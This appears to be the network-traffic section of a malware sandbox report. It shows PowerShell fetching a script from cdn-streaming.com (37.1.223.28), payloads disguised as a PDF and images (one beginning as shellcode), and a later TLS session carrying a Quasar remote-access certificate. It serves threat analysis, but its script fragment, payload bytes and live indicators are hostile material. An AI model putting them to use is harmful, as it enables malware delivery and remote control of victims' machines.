Dec 18, 2024 23:07:35.298260927 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:35.417943001 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:35.731511116 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:35.780765057 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:07:35.923367023 CET	80	49823	37.1.223.28	192.168.2.4
Dec 18, 2024 23:07:35.968266964 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:08:00.937174082 CET	49823	80	192.168.2.4	37.1.223.28
Dec 18, 2024 23:08:01.056931973 CET	80	49823	37.1.223.28	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 23:06:03.523155928 CET	51860	53	192.168.2.4	1.1.1.1
Dec 18, 2024 23:06:03.942647934 CET	53	51860	1.1.1.1	192.168.2.4
Dec 18, 2024 23:06:04.000929117 CET	51166	53	192.168.2.4	1.1.1.1
Dec 18, 2024 23:06:04.226001024 CET	53	51166	1.1.1.1	192.168.2.4
Dec 18, 2024 23:06:22.277338028 CET	60988	53	192.168.2.4	1.1.1.1
Dec 18, 2024 23:06:35.031368971 CET	63004	53	192.168.2.4	1.1.1.1
Dec 18, 2024 23:06:51.202987909 CET	57667	53	192.168.2.4	1.1.1.1
Dec 18, 2024 23:07:29.408999920 CET	52245	53	192.168.2.4	1.1.1.1
Dec 18, 2024 23:07:29.643757105 CET	53	52245	1.1.1.1	192.168.2.4
Dec 18, 2024 23:07:51.469008923 CET	52465	53	192.168.2.4	1.1.1.1
Dec 18, 2024 23:07:51.608459949 CET	53	52465	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 23:06:03.523155928 CET	192.168.2.4	1.1.1.1	0xd26c	Standard query (0)	ebtxghggfv.cdn-streaming.com	16	IN (0x0001)	false
Dec 18, 2024 23:06:04.000929117 CET	192.168.2.4	1.1.1.1	0x25f8	Standard query (0)	cdn-streaming.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:06:22.277338028 CET	192.168.2.4	1.1.1.1	0x9f67	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:06:35.031368971 CET	192.168.2.4	1.1.1.1	0x1031	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:06:51.202987909 CET	192.168.2.4	1.1.1.1	0x34d1	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:07:29.408999920 CET	192.168.2.4	1.1.1.1	0xeda	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:07:51.469008923 CET	192.168.2.4	1.1.1.1	0xf050	Standard query (0)	ipwho.is	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 23:06:03.942647934 CET	1.1.1.1	192.168.2.4	0xd26c	No error (0)	ebtxghggfv.cdn-streaming.com			TXT (Text strings)	IN (0x0001)	false
Dec 18, 2024 23:06:04.226001024 CET	1.1.1.1	192.168.2.4	0x25f8	No error (0)	cdn-streaming.com		37.1.223.28	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:06:19.999790907 CET	1.1.1.1	192.168.2.4	0x5bc0	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:06:19.999790907 CET	1.1.1.1	192.168.2.4	0x5bc0	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:06:22.585680008 CET	1.1.1.1	192.168.2.4	0x9f67	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 23:06:35.171936035 CET	1.1.1.1	192.168.2.4	0x1031	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 23:06:51.440776110 CET	1.1.1.1	192.168.2.4	0x34d1	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 18, 2024 23:07:29.643757105 CET	1.1.1.1	192.168.2.4	0xeda	No error (0)	ipwho.is		108.181.61.49	A (IP address)	IN (0x0001)	false
Dec 18, 2024 23:07:51.608459949 CET	1.1.1.1	192.168.2.4	0xf050	No error (0)	ipwho.is		108.181.61.49	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cdn-streaming.com

ipwho.is

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49823	37.1.223.28	80	7284	C:\Windows\Tasks\winver.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 23:07:27.464201927 CET	153	OUT	Data Raw: 16 03 03 00 94 01 00 00 90 03 03 67 63 47 9e 14 e1 0a c7 a3 a6 14 fa 2c 89 aa f4 db f0 ff b5 69 4d 6a 13 ec d1 bf e1 6c af 83 37 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: gcG,iMjl7*,+0/$#('=<5/=#
Dec 18, 2024 23:07:28.749124050 CET	1236	IN	Data Raw: 16 03 03 07 c8 02 00 00 51 03 03 67 63 47 a0 90 4e a5 99 1e 8a ae 78 00 f8 29 71 e6 59 24 e3 0f b6 b1 76 e2 76 27 ab fb fc ee b4 20 b3 32 00 00 b1 6d 6d ef 65 bc 4f 40 05 fc 57 a5 0f e8 9f fb 1a 76 42 f1 f6 ba 2e 03 f5 85 af ea c0 30 00 00 09 00 Data Ascii: QgcGNx)qY$vv' 2mmeO@WvB.000<4V0*H010UQuasar Server CA0 241213201534Z99991231235959Z010UQuasar Server CA0"0
Dec 18, 2024 23:07:28.749330997 CET	761	IN	Data Raw: dd d6 58 48 e8 f1 4e 39 2e 9b a5 03 82 cb e3 07 d5 32 e5 23 1b 8a b0 0f 8a b5 7c 2a 8f 8f eb 7f 81 75 24 8e bd c2 7c 5f cf 96 67 13 fc 12 1c 99 6c 9d a8 59 fc 9f 03 02 ee 5b 9f 3d 11 2c f4 ab 22 8f 48 bb 59 62 8a 3b 15 8f 69 53 29 14 52 3b bb c5 Data Ascii: XHN9.2#\|*u$\|_glY[=,"HYb;iS)R;DXsNGWAp'>/<fi[;Lk,a04$ugia}6]L2(HY9S&/F"\H<%XsieN;W]0bQY;.8
Dec 18, 2024 23:07:28.753382921 CET	158	OUT	Data Raw: 16 03 03 00 66 10 00 00 62 61 04 2c e3 71 c4 92 8e c2 b5 c3 05 4a 67 74 8a 36 b1 82 e2 9f 7d 48 ff b4 c4 bd 8e 3a 66 e7 ff 6c d7 5f 01 0a dc dd 8b b2 8a 15 3e 96 50 ca 54 44 44 77 46 82 ca 05 d8 06 66 09 4b 45 4b b3 cd a3 7f 59 d0 98 7b cb 4e 01 Data Ascii: fba,qJgt6}H:fl_>PTDDwFfKEKY{N\zc,v+QDx3*N(:jRePwfK,t2{
Dec 18, 2024 23:07:29.186315060 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 1a 46 04 01 d1 85 88 1f 70 14 b4 9a 44 b5 ba 21 d4 9b 76 a0 97 5d 83 da c4 21 ee 37 37 f5 96 6e Data Ascii: (FpD!v]!77n
Dec 18, 2024 23:07:35.177198887 CET	33	OUT	Data Raw: 17 03 03 00 1c 00 00 00 00 00 00 00 01 e1 ec b7 fe 18 e9 77 60 c0 b2 eb 17 d8 50 07 0d 4c de 29 95 Data Ascii: w`PL)
Dec 18, 2024 23:07:35.298260927 CET	733	OUT	Data Raw: 17 03 03 02 d8 00 00 00 00 00 00 00 02 29 b6 8b 2b ef 63 85 c8 a2 80 41 e7 bd 64 e3 2d 7a 01 46 78 9c 93 07 6f 01 44 44 f4 f5 40 3d fa 1c 50 b9 ae e4 29 7b e3 b0 92 36 d1 6c 17 94 23 b2 55 22 16 0e 78 87 7e 5b a3 ee 2f b6 da ae 06 5b a6 f0 41 95 Data Ascii: )+cAd-zFxoDD@=P){6l#U"x~[/[A'p):^&:Jm/h(q-2'A08,S.+'3mOE`k_("bJea}'u;LPT$GmHh
Dec 18, 2024 23:07:35.731511116 CET	33	IN	Data Raw: 17 03 03 00 1c 00 00 00 00 00 00 00 01 35 41 d1 6a 35 7c 4b 9c 88 4d d8 f5 eb 12 27 e9 2a 86 e7 69 Data Ascii: 5Aj5\|KM'*i
Dec 18, 2024 23:07:35.923367023 CET	33	IN	Data Raw: 17 03 03 00 1c 00 00 00 00 00 00 00 02 ad e2 79 5f 7e c3 81 46 53 ef 8c 09 48 79 6e 40 92 50 c7 18 Data Ascii: y_~FSHyn@P
Dec 18, 2024 23:08:00.937174082 CET	6	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	37.1.223.28	443	7352	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 22:06:05 UTC	91	OUT	GET /hP3TJdoqvDIYbA3JIxDstAFA HTTP/1.1 Host: cdn-streaming.com Connection: Keep-Alive
2024-12-18 22:06:06 UTC	224	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 22:06:05 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 18 Dec 2024 00:08:47 GMT ETag: "c27-6298037b864d0" Accept-Ranges: bytes Content-Length: 3111 Connection: close
2024-12-18 22:06:06 UTC	3111	IN	Data Raw: 0a 0a 24 73 63 72 69 70 74 46 69 6c 65 6e 61 6d 65 20 3d 20 5b 67 75 69 64 5d 3a 3a 4e 65 77 47 75 69 64 28 29 2e 54 6f 53 74 72 69 6e 67 28 29 0a 24 61 75 74 6f 69 74 46 69 6c 65 6e 61 6d 65 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 24 65 6e 76 3a 77 69 6e 64 69 72 5c 53 79 73 74 65 6d 33 32 20 2d 46 69 6c 74 65 72 20 22 2a 2e 65 78 65 22 20 7c 20 47 65 74 2d 52 61 6e 64 6f 6d 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 45 78 70 61 6e 64 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 0a 0a 24 65 6e 74 72 69 65 73 20 3d 20 40 28 0a 20 20 20 20 40 7b 0a 20 20 20 20 20 20 20 20 75 72 6c 20 3d 20 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 73 74 72 65 61 6d 69 6e 67 2e 63 6f 6d 2f 36 32 72 67 78 39 54 39 4d 57 2e 70 64 66 22 0a 20 20 20 20 20 20 20 20 Data Ascii: $scriptFilename = [guid]::NewGuid().ToString()$autoitFilename = Get-ChildItem $env:windir\System32 -Filter "*.exe" \| Get-Random \| Select-Object -ExpandProperty Name$entries = @( @{ url = "https://cdn-streaming.com/62rgx9T9MW.pdf"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	37.1.223.28	443	7352	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 22:06:07 UTC	57	OUT	GET /62rgx9T9MW.pdf HTTP/1.1 Host: cdn-streaming.com
2024-12-18 22:06:08 UTC	256	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 22:06:08 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 17 Dec 2024 23:58:10 GMT ETag: "1273-6298011bc9856" Accept-Ranges: bytes Content-Length: 4723 Connection: close Content-Type: application/pdf
2024-12-18 22:06:08 UTC	4723	IN	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 32 34 20 30 20 6f 62 6a 0d 3c 3c 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 46 69 72 73 74 20 34 2f 4c 65 6e 67 74 68 20 32 31 36 2f 4e 20 31 2f 54 79 70 65 2f 4f 62 6a 53 74 6d 3e 3e 73 74 72 65 61 6d 0d 0a 68 de 3c 8f 51 4b c3 30 14 85 ff ca 7d 5b 8b d8 de a4 24 3a 19 83 69 14 14 c4 32 c5 bd ec 25 4b 6e 35 98 36 92 26 9b 3f df 56 c5 d7 73 0f df fd ce 12 10 56 ab 7a 93 d3 7b 88 85 a2 4f 1d 53 4f 43 82 d0 c1 43 1e 93 33 04 fb e2 f6 8b 4c 4e ee 48 f0 d4 75 73 34 5d ef fb de bd 45 9d 5c 18 60 4b 47 47 a7 7d 59 d6 37 91 7e 22 a5 13 15 ea 8a 23 4a 6c 50 32 81 b2 69 ce 51 2c 10 17 7f ad e9 df c6 86 03 b5 cf a2 b2 de c3 2b c5 71 86 89 8a 57 bc ac 1f 83 fd 87 30 89 17 4c 30 64 9c b3 33 bc fc 85 b4 Data Ascii: %PDF-1.6%24 0 obj<</Filter/FlateDecode/First 4/Length 216/N 1/Type/ObjStm>>streamh<QK0}[$:i2%Kn56&?VsVz{OSOCC3LNHus4]E\`KGG}Y7~"#JlP2iQ,+qW0L0d3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	37.1.223.28	443	7352	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 22:06:09 UTC	53	OUT	GET /avatar.jpg HTTP/1.1 Host: cdn-streaming.com
2024-12-18 22:06:10 UTC	256	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 22:06:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 17 Dec 2024 22:58:42 GMT ETag: "31e810-6297f3d1225de" Accept-Ranges: bytes Content-Length: 3270672 Connection: close Content-Type: image/jpeg
2024-12-18 22:06:10 UTC	7936	IN	Data Raw: 56 48 89 e6 48 83 e4 f0 48 83 ec 20 e8 5f 09 00 00 48 89 f4 5e c3 e8 01 00 00 00 c3 48 8b 04 24 48 83 e8 1b c3 66 2e 0f 1f 84 00 00 00 00 00 90 57 56 89 ce 53 48 83 ec 20 65 48 8b 04 25 30 00 00 00 48 8b 40 60 48 8b 40 18 48 8b 58 10 48 8d 78 10 48 39 fb 74 1c 0f b7 53 58 48 8b 4b 60 e8 cc 0d 00 00 39 f0 75 06 48 8b 43 30 eb 07 48 8b 1b eb df 31 c0 48 83 c4 20 5b 5e 5f c3 31 c0 66 81 39 4d 5a 75 11 48 63 41 3c 48 01 c8 81 38 50 45 00 00 74 02 31 c0 c3 48 85 c9 0f 84 a6 00 00 00 41 57 41 56 41 55 41 89 d5 41 54 55 57 56 53 48 83 ec 38 85 d2 75 04 31 c0 eb 7a e8 bc ff ff ff 48 89 cb 48 85 c0 74 ef 8b b0 88 00 00 00 45 31 e4 8b 80 8c 00 00 00 48 01 ce 8b 6e 20 89 44 24 2c 44 8b 76 1c 44 8b 7e 24 44 3b 66 18 73 c8 44 89 e7 31 d2 48 8d 04 bb 8b 0c 28 48 01 d9 Data Ascii: VHHH _H^H$Hf.WVSH eH%0H@`H@HXHxH9tSXHK`9uHC0H1H [^_1f9MZuHcA<H8PEt1HAWAVAUAATUWVSH8u1zHHtE1Hn D$,DvD~$D;fsD1H(H
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: ab ab aa bb ab ab aa aa ba ab aa ab ba ab aa ba ba ab aa bb ba ab aa aa bb ab aa ab bb ab aa ba bb ab aa bb bb ab aa aa aa ba aa ab aa ba aa ba aa ba aa bb aa ba aa aa ab ba aa ab ab ba aa ba ab ba aa bb ab ba aa aa ba ba aa ab ba ba aa ba ba ba aa bb ba ba aa aa bb ba aa ab bb ba aa ba bb ba aa bb bb ba aa aa aa bb aa ab aa bb aa ba aa bb aa bb aa bb aa aa ab bb aa ab ab bb aa ba ab bb aa bb ab bb aa aa ba bb aa ab ba bb aa ba ba bb aa bb ba bb aa aa bb bb aa ab bb bb aa ba bb bb aa bb bb bb aa aa aa aa ab ab aa aa ab ba aa aa ab bb aa aa ab aa ab aa ab ab ab aa ab ba ab aa ab bb ab aa ab aa ba aa ab ab ba aa ab ba ba aa ab bb ba aa ab aa bb aa ab ab bb aa ab ba bb aa ab bb bb aa ab aa aa ab ab ab aa ab ab ba aa ab ab bb aa ab ab aa ab ab ab ab ab ab ab Data Ascii:
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: aa 85 85 1e aa 1e 1e d2 aa d2 d2 ac aa ac ac 4d aa 4d 4d db aa db db 7e aa 7e 7e 01 aa 01 01 22 aa 22 22 27 aa 27 27 d8 aa d8 d8 13 aa 13 13 52 aa 52 52 06 aa 06 06 9c aa 9c 9c 80 aa 80 80 96 aa 96 96 5b aa 5b 5b ea aa ea ea 79 aa 79 79 11 aa 11 11 e9 aa e9 e9 bf aa bf bf 07 aa 07 07 dd aa dd dd 2a aa 2a 2a 28 aa 28 28 46 aa 46 46 8d aa 8d 8d 4f aa 4f 4f 2f aa 2f 2f 9f aa 9f 9f a6 aa a6 a6 eb aa eb eb 45 aa 45 45 39 aa 39 39 b3 aa b3 b3 8b aa 8b 8b a4 aa a4 a4 e4 aa e4 e4 cf aa cf cf 17 aa 17 17 12 aa 12 12 25 aa 25 25 41 aa 41 41 64 aa 64 64 9a aa 9a 9a f5 aa f5 f5 6f aa 6f 6f b0 aa b0 b0 4b aa 4b 4b 60 aa 60 60 ed aa ed ed 97 aa 97 97 ab aa ab ab 7c aa 7c 7c fc aa fc fc e7 aa e7 e7 a7 aa a7 a7 cc aa cc cc 66 aa 66 66 87 aa 87 87 b8 aa b8 b8 8a aa 8a 8a Data Ascii: MMM~~~"""'''RRR[[[yyy***(((FFFOOO///EEE999%%%AAAdddoooKKK```\|\|\|fff
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: e9 b5 87 0e dc d1 1d 66 11 94 f0 51 ca 1b 2c 91 f8 0b c6 00 ff 83 37 3d 18 2d 3a cb 14 76 56 16 3f 65 67 9d 95 f1 7b f9 93 2e 96 eb 08 c7 ed be 80 34 f7 fc 58 79 01 ee bb 38 73 89 8a 84 23 1e d6 12 8c dd 33 49 0f cd e0 47 74 6f 9b 54 b2 a7 c9 26 2a 6a 5d da ad ab aa aa aa aa aa aa aa a8 aa aa aa aa aa aa aa ab aa aa aa aa aa aa aa 54 55 55 55 55 55 55 55 57 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 51 aa aa aa ab ab aa aa ad ab aa aa aa aa aa aa f5 a8 aa aa cf a8 aa aa c3 a8 aa aa aa aa aa aa aa a9 af a5 bb 99 ff 55 b0 84 d8 3c 0b 52 b9 9f f5 4b 92 e2 72 d9 3f 0e 5d a8 ac a0 b4 88 cc 00 4f 9e f6 4e 9d f3 41 8c c0 14 73 da 3a 01 4c 9b f9 5f ae a6 be 96 ee 66 e5 7b c2 12 79 c4 18 67 e6 7e cd 03 4a 91 e7 7d c8 0c 5b a2 b2 82 d2 22 29 34 13 7a c1 17 76 d5 Data Ascii: fQ,7=-:vV?eg{.4Xy8s#3IGtoT&*j]TUUUUUUUWUUUUUUUUUUUUUUUQU<RKr?]ONAs:L_f{yg~J}[")4zv
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: a5 a6 ad ac aa a3 a1 ad a7 a0 ab aa a2 a3 a5 a4 ae ac a6 a1 a8 af a9 ac a6 ad ab af a5 a7 a2 ae a0 a3 a4 aa a9 a1 a8 ae a1 a0 aa ad a8 ab a7 a9 ac a2 af a3 a6 a5 a4 a7 a1 ae ab a9 a5 af a3 aa a0 a4 ad ac a2 a8 a6 ab a5 a7 aa af ad a0 ae a3 a8 a9 a4 ac a1 a2 a6 43 aa aa aa 45 aa aa aa 5b aa aa aa aa aa aa aa 55 55 55 55 55 55 55 55 54 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 ea 68 45 27 35 f7 50 8f 15 97 3a 41 ad 63 ba 42 55 d5 ca ed e1 4e 35 9c ee 6c b5 26 3a 60 64 04 15 53 1b 14 40 60 51 44 fa b3 65 42 04 ad 75 fb ac 22 a4 38 e2 af 07 5a 29 27 96 4b 7f ba da 38 35 d7 ba bb 13 d7 ce ad 7e 4e 49 18 f4 82 e5 97 8a 02 05 13 4a 28 74 50 21 8c cd 0a 84 d3 d8 28 6a 18 95 ff 81 48 30 e2 3e 3d 45 7e 16 95 f4 b8 44 56 55 8b 57 b1 f1 28 47 6f ff 38 ea 08 fd b8 Data Ascii: CE[UUUUUUUUTUUUUUUUUUUUUUUUhE'5P:AcBUN5l&:`dS@`QDeBu"8Z)'K85~NIJ(tP!(jH0>=E~DVUW(Go8
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: aa aa aa ca aa aa aa 2a aa aa aa 6a aa aa aa aa ab aa aa 2a ab aa aa aa a8 aa aa aa a9 aa aa aa ae aa aa aa ac aa aa aa a2 aa aa aa a6 aa aa aa ba aa aa aa b2 aa aa aa 8a aa aa aa 9a aa aa aa ea aa aa aa ca aa aa cd 4c a3 c0 2f 04 cd 11 d8 59 c4 96 90 5f e5 0f d5 f8 a4 fb 26 c2 af 31 01 73 29 b5 b3 67 4a f1 b0 7f 8f a9 89 f2 21 ab 3f 86 d1 aa 87 03 ae a9 24 f3 78 aa f6 76 7c ab d5 26 92 ab a0 46 95 ab d8 c1 34 a8 c7 78 e8 aa 43 da d0 e1 ee 83 19 1f 84 a3 df 71 89 8c b3 6e 1a 0c c4 07 d7 75 0d e3 12 ca 44 36 cc 18 47 25 db 26 00 46 55 bd 30 c3 c6 f8 ce fc 4b 34 1b 68 0f a8 9c b3 83 e6 a3 df ea b9 f3 0a 94 90 b2 4e 30 32 fe 95 cf 37 e8 f1 7c 4e 25 c1 7c 95 5d 33 ad 36 78 0b 5f 9a 42 45 4c 92 87 e7 6b f7 8f 5a 2c 8a 77 e6 8c 41 da 2e 6c 43 28 c9 f4 66 b4 a8 Data Ascii: jL/Y_&1s)gJ!?$xv\|&F4xCqnuD6G%&FU0K4hN027\|N%\|]36x_BELkZ,wA.lC(f
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: aa aa aa a2 aa aa aa b6 aa aa aa aa aa aa aa a3 aa aa aa 32 aa aa aa fe aa aa aa ad aa aa aa f9 aa aa aa aa aa aa aa a2 aa aa aa d6 aa aa aa aa aa aa aa a2 aa aa aa 96 aa aa aa aa aa aa aa a3 aa aa aa 72 aa aa aa f8 aa aa aa ad aa aa aa bd aa aa aa aa aa aa aa a2 aa aa aa c6 aa aa aa aa aa aa aa a2 aa aa aa 86 aa aa aa aa aa aa aa a3 aa aa aa 12 aa aa aa aa aa aa aa a2 aa aa aa a6 aa aa aa aa aa aa aa a2 aa aa aa 26 aa aa aa aa aa aa aa a2 aa aa aa e6 aa aa aa aa aa aa aa a3 aa aa aa 52 aa aa aa fa aa aa aa ad aa aa aa a9 aa aa aa aa aa aa aa a2 aa aa aa f8 aa aa aa aa aa aa aa a2 aa aa aa b8 aa aa aa ff aa aa aa a2 aa aa aa 09 aa aa aa f9 aa aa aa ad aa aa aa 89 aa aa aa aa aa aa aa a2 aa aa aa d8 aa aa aa aa aa aa aa a2 aa aa aa 98 aa aa aa aa aa aa aa Data Ascii: 2r&R
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: 11 7c c7 bc bc 90 86 f8 a3 c0 7f 9a 9c 0f 92 15 ea 09 34 2b 59 7d 51 d6 49 93 28 31 85 55 2d 9e 24 e9 ee 6e 74 43 61 fe d1 3e 98 0c 68 89 97 44 e6 3f a1 e8 50 69 e4 a2 84 0b cc 82 73 8e 18 dc f1 08 e3 c7 21 7b 8f d8 52 5c ce 2c c2 32 bc 7e 0e f6 66 f7 cf 1c 38 c6 da e2 fa 57 47 13 70 f4 bf ec fd 0d 27 37 2e 3a 72 01 aa 26 16 79 a0 5d 4e f2 af 12 19 ef ac 7a 86 b4 25 60 95 a5 a8 6b 05 17 a9 ab b9 20 c1 90 3b bb eb e5 cd 76 40 3d 58 65 64 5a 1e 4c d9 3c 06 de 88 4d 07 9f 2f 48 53 9d 42 b6 df 75 c4 ed 5b b0 db b7 83 6f 23 c5 1d c8 a4 00 b2 14 b1 56 fc 94 e1 6c 78 d3 8a 30 71 6a 54 d2 67 f0 5e b5 77 02 99 22 ad 6d 9b 1b b8 ba f3 8d 2a 46 f5 ca fb d5 03 b3 1f e0 a7 87 4f d0 35 39 63 36 45 0a 4a 91 e7 04 80 5f 1a 62 41 11 96 29 f9 33 cb bd 81 ae d4 10 dd 7c 8c Data Ascii: \|4+Y}QI(1U-$ntCa>hD?Pis!{R\,2~f8WGp'7.:r&y]Nz%`k ;v@=XedZL<M/HSBu[o#Vlx0qjTg^w"m*FO59c6EJ_bA)3\|
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: 5f 29 b1 50 00 1b 9b 73 1d 80 4e 3c 8d 06 5b 06 41 78 56 7d 0d 09 ea 6f 16 51 a0 c7 b9 fc ba 2f a6 c7 30 77 4b 23 d2 00 de d3 80 d2 8f 9f 79 31 6a 20 ad a3 f7 48 0d 7a 47 6c 40 19 92 eb 17 da 34 41 db 14 15 a0 38 f6 c8 68 e5 5f 7a 0f 08 09 3a b8 a1 c1 49 fe 6a 81 39 54 c8 55 f3 77 5c d7 06 02 bb ef 9f 9d 9f 7e 76 50 d8 3b f4 2e 60 76 8a 37 98 ca 81 52 2e b2 85 cd 67 4b 86 6c d3 86 ce 8e 7b 07 08 a3 21 8c 4d 73 b3 c0 43 6b 7a a6 fa 03 e1 31 c0 d2 f0 59 e9 e6 c9 9c a9 a8 a4 88 72 cc 41 e0 ed d1 6b 68 00 31 46 49 b0 d9 c0 f2 a8 2e 4a d0 cc 8c 28 0f 46 60 3b dc fc 7e cd 1f 07 df e2 f6 bf 3e b7 75 95 2b f1 32 57 aa c7 ac 67 de 1d 56 c4 82 fb 05 ee 0d b5 ed 9e 22 f4 84 04 cb 4d 04 0a 86 5d 30 4a 42 04 67 4e ea 14 cf 5c b2 fb 11 a1 3d 43 ce b3 75 99 41 e1 c4 d8 Data Ascii: _)PsN<[AxV}oQ/0wK#y1j HzGl@4A8h_z:Ij9TUw\~vP;.`v7R.gKl{!MsCkz1YrAkh1FI.J(F`;~>u+2WgV"M]0JBgN\=CuA
2024-12-18 22:06:10 UTC	8000	IN	Data Raw: 8d 02 bf 67 bc 54 e9 5c da c3 0a 9b 38 ae 67 1a e6 66 3d c6 20 16 4d 6a 13 19 56 9f 42 d6 99 59 2a 6d d6 f2 58 74 cf fa 11 98 eb 74 e4 8b f8 75 39 5e 3a e9 f4 5b 3f 5b 4a 78 f7 c8 93 a2 2d 05 cc 21 51 b0 96 9b eb 16 bb 18 fb 5a a0 d8 3b d9 0f 44 7e d4 e8 d7 ed 8f 14 49 5c 44 e6 91 84 e9 66 a1 41 9e d2 c8 28 62 8e 4d d2 77 49 a9 36 53 d7 2c 73 20 98 dd 82 58 1a e9 48 ef b3 1f be 48 3d 41 5d 22 a5 e1 fd 90 3e 0e 30 32 50 1c 22 2c 2f bc 61 c2 5a 6e b3 45 50 bb 05 a3 ce 44 fa 0e 01 e4 6a 7f bd 59 d7 03 6c 1e 32 fe d6 fc d0 24 b2 e8 e5 2a 51 11 1c a1 67 6f 91 65 81 68 96 b9 dd 93 00 40 9c e9 7a 86 b9 99 46 b1 06 85 5a 27 e2 79 5a 0d 71 ac 8f b4 b0 69 58 c1 f7 4c 7d 5f 8a 52 b5 bc 18 13 f4 35 a5 c4 6e fa ac 84 2e ab 9a 2e 34 b7 41 c1 db 7e f4 9b 01 26 df 99 03 Data Ascii: gT\8gf= MjVBYmXttu9^:[?[Jx-!QZ;D~I\DfA(bMwI6S,s XHH=A]">02P",/aZnEPDjYl2$Qgoeh@zFZ'yZqiXL}_R5n..4A~&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	37.1.223.28	443	7352	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 22:06:17 UTC	51	OUT	GET /logo.png HTTP/1.1 Host: cdn-streaming.com
2024-12-18 22:06:17 UTC	255	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 22:06:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 17 Dec 2024 22:58:42 GMT ETag: "105a58-6297f3d0f764f" Accept-Ranges: bytes Content-Length: 1071704 Connection: close Content-Type: image/png
